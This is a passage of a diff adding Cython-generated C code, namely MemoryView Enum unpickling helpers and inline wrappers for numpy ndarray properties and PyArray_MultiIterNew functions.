__pyx_result = Enum.__new__(__pyx_type) + * if __pyx_state is not None: + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) # <<<<<<<<<<<<<< + * return __pyx_result + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): + */ + if (!(likely(PyTuple_CheckExact(__pyx_v___pyx_state))||((__pyx_v___pyx_state) == Py_None) || __Pyx_RaiseUnexpectedTypeError("tuple", __pyx_v___pyx_state))) __PYX_ERR(1, 9, __pyx_L1_error) + __pyx_t_1 = __pyx_unpickle_Enum__set_state(((struct __pyx_MemviewEnum_obj *)__pyx_v___pyx_result), ((PyObject*)__pyx_v___pyx_state)); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 9, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "(tree fragment)":8 + * raise __pyx_PickleError, "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))" % __pyx_checksum + * __pyx_result = Enum.__new__(__pyx_type) + * if __pyx_state is not None: # <<<<<<<<<<<<<< + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + * return __pyx_result + */ + } + + /* "(tree fragment)":10 + * if __pyx_state is not None: + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + * return __pyx_result # <<<<<<<<<<<<<< + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): + * __pyx_result.name = __pyx_state[0] + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v___pyx_result); + __pyx_r = __pyx_v___pyx_result; + goto __pyx_L0; + + /* "(tree fragment)":1 + * def __pyx_unpickle_Enum(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("View.MemoryView.__pyx_unpickle_Enum", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v___pyx_PickleError); + __Pyx_XDECREF(__pyx_v___pyx_result); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":11 + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + * return __pyx_result + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): # <<<<<<<<<<<<<< + * __pyx_result.name = __pyx_state[0] + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): + */ + +static PyObject *__pyx_unpickle_Enum__set_state(struct __pyx_MemviewEnum_obj *__pyx_v___pyx_result, PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_t_2; + Py_ssize_t __pyx_t_3; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + int __pyx_t_8; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_unpickle_Enum__set_state", 0); + + /* "(tree fragment)":12 + * return __pyx_result + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): + * __pyx_result.name = __pyx_state[0] # <<<<<<<<<<<<<< + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): + * __pyx_result.__dict__.update(__pyx_state[1]) + */ + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 12, __pyx_L1_error) + } + __pyx_t_1 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 12, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + __Pyx_GOTREF(__pyx_v___pyx_result->name); + __Pyx_DECREF(__pyx_v___pyx_result->name); + __pyx_v___pyx_result->name = __pyx_t_1; + __pyx_t_1 = 0; + + /* "(tree fragment)":13 + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): + * __pyx_result.name = __pyx_state[0] + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): # <<<<<<<<<<<<<< + * __pyx_result.__dict__.update(__pyx_state[1]) + */ + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "object of type 'NoneType' has no len()"); + __PYX_ERR(1, 13, __pyx_L1_error) + } + __pyx_t_3 = PyTuple_GET_SIZE(__pyx_v___pyx_state); if (unlikely(__pyx_t_3 == ((Py_ssize_t)-1))) __PYX_ERR(1, 13, __pyx_L1_error) + __pyx_t_4 = (__pyx_t_3 > 1); + if (__pyx_t_4) { + } else { + __pyx_t_2 = __pyx_t_4; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_4 = __Pyx_HasAttr(((PyObject *)__pyx_v___pyx_result), __pyx_n_s_dict); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(1, 13, __pyx_L1_error) + __pyx_t_2 = __pyx_t_4; + __pyx_L4_bool_binop_done:; + if (__pyx_t_2) { + + /* "(tree fragment)":14 + * __pyx_result.name = __pyx_state[0] + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): + * __pyx_result.__dict__.update(__pyx_state[1]) # <<<<<<<<<<<<<< + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v___pyx_result), __pyx_n_s_dict); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = __Pyx_PyObject_GetAttrStr(__pyx_t_5, __pyx_n_s_update); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(__pyx_v___pyx_state == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 14, __pyx_L1_error) + } + __pyx_t_5 = __Pyx_GetItemInt_Tuple(__pyx_v___pyx_state, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_7 = NULL; + __pyx_t_8 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_6))) { + __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_6); + if (likely(__pyx_t_7)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_6); + __Pyx_INCREF(__pyx_t_7); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_6, function); + __pyx_t_8 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_7, __pyx_t_5}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_6, __pyx_callargs+1-__pyx_t_8, 1+__pyx_t_8); + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 14, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "(tree fragment)":13 + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): + * __pyx_result.name = __pyx_state[0] + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): # <<<<<<<<<<<<<< + * __pyx_result.__dict__.update(__pyx_state[1]) + */ + } + + /* "(tree fragment)":11 + * __pyx_unpickle_Enum__set_state( __pyx_result, __pyx_state) + * return __pyx_result + * cdef __pyx_unpickle_Enum__set_state(Enum __pyx_result, tuple __pyx_state): # <<<<<<<<<<<<<< + * __pyx_result.name = __pyx_state[0] + * if len(__pyx_state) > 1 and hasattr(__pyx_result, '__dict__'): + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_AddTraceback("View.MemoryView.__pyx_unpickle_Enum__set_state", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":245 + * + * @property + * cdef inline PyObject* base(self) nogil: # <<<<<<<<<<<<<< + * """Returns a borrowed reference to the object owning the data/memory. + * """ + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_7ndarray_4base_base(PyArrayObject *__pyx_v_self) { + PyObject *__pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":248 + * """Returns a borrowed reference to the object owning the data/memory. + * """ + * return PyArray_BASE(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_BASE(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":245 + * + * @property + * cdef inline PyObject* base(self) nogil: # <<<<<<<<<<<<<< + * """Returns a borrowed reference to the object owning the data/memory. + * """ + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":251 + * + * @property + * cdef inline dtype descr(self): # <<<<<<<<<<<<<< + * """Returns an owned reference to the dtype of the array. + * """ + */ + +static CYTHON_INLINE PyArray_Descr *__pyx_f_5numpy_7ndarray_5descr_descr(PyArrayObject *__pyx_v_self) { + PyArray_Descr *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyArray_Descr *__pyx_t_1; + __Pyx_RefNannySetupContext("descr", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":254 + * """Returns an owned reference to the dtype of the array. + * """ + * return PyArray_DESCR(self) # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF((PyObject *)__pyx_r); + __pyx_t_1 = PyArray_DESCR(__pyx_v_self); + __Pyx_INCREF((PyObject *)((PyArray_Descr *)__pyx_t_1)); + __pyx_r = ((PyArray_Descr *)__pyx_t_1); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":251 + * + * @property + * cdef inline dtype descr(self): # <<<<<<<<<<<<<< + * """Returns an owned reference to the dtype of the array. + * """ + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF((PyObject *)__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":257 + * + * @property + * cdef inline int ndim(self) nogil: # <<<<<<<<<<<<<< + * """Returns the number of dimensions in the array. + * """ + */ + +static CYTHON_INLINE int __pyx_f_5numpy_7ndarray_4ndim_ndim(PyArrayObject *__pyx_v_self) { + int __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":260 + * """Returns the number of dimensions in the array. + * """ + * return PyArray_NDIM(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_NDIM(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":257 + * + * @property + * cdef inline int ndim(self) nogil: # <<<<<<<<<<<<<< + * """Returns the number of dimensions in the array. + * """ + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":263 + * + * @property + * cdef inline npy_intp *shape(self) nogil: # <<<<<<<<<<<<<< + * """Returns a pointer to the dimensions/shape of the array. + * The number of elements matches the number of dimensions of the array (ndim). + */ + +static CYTHON_INLINE npy_intp *__pyx_f_5numpy_7ndarray_5shape_shape(PyArrayObject *__pyx_v_self) { + npy_intp *__pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":268 + * Can return NULL for 0-dimensional arrays. + * """ + * return PyArray_DIMS(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_DIMS(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":263 + * + * @property + * cdef inline npy_intp *shape(self) nogil: # <<<<<<<<<<<<<< + * """Returns a pointer to the dimensions/shape of the array. + * The number of elements matches the number of dimensions of the array (ndim). + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":271 + * + * @property + * cdef inline npy_intp *strides(self) nogil: # <<<<<<<<<<<<<< + * """Returns a pointer to the strides of the array. + * The number of elements matches the number of dimensions of the array (ndim). + */ + +static CYTHON_INLINE npy_intp *__pyx_f_5numpy_7ndarray_7strides_strides(PyArrayObject *__pyx_v_self) { + npy_intp *__pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":275 + * The number of elements matches the number of dimensions of the array (ndim). + * """ + * return PyArray_STRIDES(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_STRIDES(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":271 + * + * @property + * cdef inline npy_intp *strides(self) nogil: # <<<<<<<<<<<<<< + * """Returns a pointer to the strides of the array. + * The number of elements matches the number of dimensions of the array (ndim). + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":278 + * + * @property + * cdef inline npy_intp size(self) nogil: # <<<<<<<<<<<<<< + * """Returns the total size (in number of elements) of the array. + * """ + */ + +static CYTHON_INLINE npy_intp __pyx_f_5numpy_7ndarray_4size_size(PyArrayObject *__pyx_v_self) { + npy_intp __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":281 + * """Returns the total size (in number of elements) of the array. + * """ + * return PyArray_SIZE(self) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_r = PyArray_SIZE(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":278 + * + * @property + * cdef inline npy_intp size(self) nogil: # <<<<<<<<<<<<<< + * """Returns the total size (in number of elements) of the array. + * """ + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":284 + * + * @property + * cdef inline char* data(self) nogil: # <<<<<<<<<<<<<< + * """The pointer to the data buffer as a char*. + * This is provided for legacy reasons to avoid direct struct field access. + */ + +static CYTHON_INLINE char *__pyx_f_5numpy_7ndarray_4data_data(PyArrayObject *__pyx_v_self) { + char *__pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":290 + * of `PyArray_DATA()` instead, which returns a 'void*'. + * """ + * return PyArray_BYTES(self) # <<<<<<<<<<<<<< + * + * ctypedef unsigned char npy_bool + */ + __pyx_r = PyArray_BYTES(__pyx_v_self); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":284 + * + * @property + * cdef inline char* data(self) nogil: # <<<<<<<<<<<<<< + * """The pointer to the data buffer as a char*. + * This is provided for legacy reasons to avoid direct struct field access. + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":776 + * ctypedef npy_cdouble complex_t + * + * cdef inline object PyArray_MultiIterNew1(a): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(1, a) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew1(PyObject *__pyx_v_a) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew1", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":777 + * + * cdef inline object PyArray_MultiIterNew1(a): + * return PyArray_MultiIterNew(1, a) # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew2(a, b): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(1, ((void *)__pyx_v_a)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 777, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":776 + * ctypedef npy_cdouble complex_t + * + * cdef inline object PyArray_MultiIterNew1(a): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(1, a) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew1", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":779 + * return PyArray_MultiIterNew(1, a) + * + * cdef inline object PyArray_MultiIterNew2(a, b): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(2, a, b) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew2(PyObject *__pyx_v_a, PyObject *__pyx_v_b) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew2", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":780 + * + * cdef inline object PyArray_MultiIterNew2(a, b): + * return PyArray_MultiIterNew(2, a, b) # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew3(a, b, c): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(2, ((void *)__pyx_v_a), ((void *)__pyx_v_b)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 780, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":779 + * return PyArray_MultiIterNew(1, a) + * + * cdef inline object PyArray_MultiIterNew2(a, b): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(2, a, b) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew2", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":782 + * return PyArray_MultiIterNew(2, a, b) + * + * cdef inline object PyArray_MultiIterNew3(a, b, c): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(3, a, b, c) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew3(PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew3", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":783 + * + * cdef inline object PyArray_MultiIterNew3(a, b, c): + * return PyArray_MultiIterNew(3, a, b, c) # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew4(a, b, c, d): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(3, ((void *)__pyx_v_a), ((void *)__pyx_v_b), ((void *)__pyx_v_c)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 783, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":782 + * return PyArray_MultiIterNew(2, a, b) + * + * cdef inline object PyArray_MultiIterNew3(a, b, c): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(3, a, b, c) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew3", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":785 + * return PyArray_MultiIterNew(3, a, b, c) + * + * cdef inline object PyArray_MultiIterNew4(a, b, c, d): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(4, a, b, c, d) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew4(PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_d) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew4", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":786 + * + * cdef inline object PyArray_MultiIterNew4(a, b, c, d): + * return PyArray_MultiIterNew(4, a, b, c, d) # <<<<<<<<<<<<<< + * + * cdef inline object PyArray_MultiIterNew5(a, b, c, d, e): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(4, ((void *)__pyx_v_a), ((void *)__pyx_v_b), ((void *)__pyx_v_c), ((void *)__pyx_v_d)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 786, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":785 + * return PyArray_MultiIterNew(3, a, b, c) + * + * cdef inline object PyArray_MultiIterNew4(a, b, c, d): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(4, a, b, c, d) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew4", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":788 + * return PyArray_MultiIterNew(4, a, b, c, d) + * + * cdef inline object PyArray_MultiIterNew5(a, b, c, d, e): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(5, a, b, c, d, e) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew5(PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_d, PyObject *__pyx_v_e) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew5", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":789 + * + * cdef inline object PyArray_MultiIterNew5(a, b, c, d, e): + * return PyArray_MultiIterNew(5, a, b, c, d, e) # <<<<<<<<<<<<<< + * + * cdef inline tuple PyDataType_SHAPE(dtype d): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(5, ((void *)__pyx_v_a), ((void *)__pyx_v_b), ((void *)__pyx_v_c), ((void *)__pyx_v_d), ((void *)__pyx_v_e)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 789, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":788 + * return PyArray_MultiIterNew(4, a, b, c, d) + * + * cdef inline object PyArray_MultiIterNew5(a, b, c, d, e): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(5, a, b, c, d, e) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew5", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":791 + * return PyArray_MultiIterNew(5, a, b, c, d, e) + * + * cdef inline tuple PyDataType_SHAPE(dtype d): # <<<<<<<<<<<<<< + * if PyDataType_HASSUBARRAY(d): + * return d.subarray.shape + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyDataType_SHAPE(PyArray_Descr *__pyx_v_d) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + __Pyx_RefNannySetupContext("PyDataType_SHAPE", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":792 + * + * cdef inline tuple PyDataType_SHAPE(dtype d): + * if PyDataType_HASSUBARRAY(d): # <<<<<<<<<<<<<< + * return d.subarray.shape + * else: + */ + __pyx_t_1 = PyDataType_HASSUBARRAY(__pyx_v_d); + if (__pyx_t_1) { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":793 + * cdef inline tuple PyDataType_SHAPE(dtype d): + * if PyDataType_HASSUBARRAY(d): + * return d.subarray.shape # <<<<<<<<<<<<<< + * else: + * return () + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(((PyObject*)__pyx_v_d->subarray->shape)); + __pyx_r = ((PyObject*)__pyx_v_d->subarray->shape); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":792 + * + * cdef inline tuple PyDataType_SHAPE(dtype d): + * if PyDataType_HASSUBARRAY(d): # <<<<<<<<<<<<<< + * return d.subarray.shape + * else: + */ + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":795 + * return d.subarray.shape + * else: + * return () # <<<<<<<<<<<<<< + * + * + */ + /*else*/ { + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_empty_tuple); + __pyx_r = __pyx_empty_tuple; + goto __pyx_L0; + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":791 + * return PyArray_MultiIterNew(5, a, b, c, d, e) + * + 